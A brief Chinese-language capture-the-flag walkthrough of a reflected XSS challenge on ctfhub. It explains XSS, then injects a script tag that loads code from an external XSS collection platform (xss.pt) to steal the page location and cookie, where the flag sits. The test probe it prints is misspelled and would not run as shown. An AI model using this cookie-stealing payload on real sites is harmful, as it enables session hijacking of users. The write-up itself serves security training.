关于xss的攻防题

				## ctfhub的xss反射型漏洞

大家好，今天我来说一说ctfhub的xss反射型漏洞。
首先，什么是xss？
xss是指恶意攻击者往Web页面里插入恶意的Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的的跨站脚本攻击。
而反射型具有非持久化性，需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容)，一般容易出现在搜索页面。
下面说一下题。
环境:ctfhub的xss反射型
考点：js(javascript)，xss平台。
首先，打开的页面如图：

然后在两个表单中的之一写入该代码(该代码是测试语句）：

<scrip>aler(1)</script>

提交后会出现一下两个图片:从图中我发现了第一个表单可能会有xss漏洞。
然后，我就用xss平台进行获取数据。
首先，我通过xss平台获得了这样一段代码：

<sCRiPt sRC=//xss.pt/B6CI>

用这个代码放入可能出现xss漏洞的表单中，如图：

然后会在xss平台上收到如图的数据：将图中的location复制粘贴到第二表单中：
然后提交，就会在xss平台中你创建的项目内找到flag，最后发现flag在cookie中。
这就是这道题的总体思路了。